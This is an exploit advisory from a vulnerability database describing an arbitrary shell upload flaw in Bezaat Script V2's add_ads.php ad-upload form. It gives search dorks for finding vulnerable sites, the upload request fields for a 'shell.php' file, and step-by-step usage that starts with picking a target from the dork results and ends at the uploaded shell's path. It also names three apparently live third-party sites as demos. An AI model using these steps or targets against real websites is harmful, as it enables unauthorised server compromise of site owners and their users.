Bezaat Script V2 Arbitrary Shell Upload Vulnerability

2016.09.15
mr xBADGIRL21 (MR) mr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Bezaat Script V2 Arbitrary Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork 1 : index of /SystemImages_ads/ # Dork 2 : Powed by Greenit Egypt for Information Technology # Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1 # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 15/09/2016 # video Proof : https://youtu.be/AWqN2cng7u4 ###################### # [★] DESCRIPTION : ###################### # [+] Bezaat Script It's An Commerce Script # [+] That Allow you To Add and Menage ads in your Website # [+] AND an Arbitrary Shell Upload has been Detected in his Script Version 2 # [+] The Other Version Maybe Also infected ###################### # [★] Poc : ###################### # When You want to Upload an Image For ads there is No Extention Check for the File Uploaded # Referer: http://127.0.0.1//add_ads.php?cat_id= # [add_ads.php] Vulnerable # Content-Disposition: form-data; name="UploadlogoFile"; filename="shell.php" # Content-Type: application/octetstream ###################### # [+] USAGE : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- http://127.0.0.1/add_ads.html or http://127.0.0.1/add_ads.php # 4.- fill the fields # 5.- Upload your Shell like :shell.php to Upload Field # 6.- Shell Directory : http://127.0.0.1/admin/SystemImages_ads/[NUM]_shell.php # http://127.0.0.1/SystemImages_ads/[NUM]_shell.php ###################### # [★] Live Demo : ###################### # http://www.dalil1808080.com/add_ads.html # http://www.al3ta.com/add_ads.php # http://www.sooqalbalad.com/add_ads.html ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/AWqN2cng7u4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top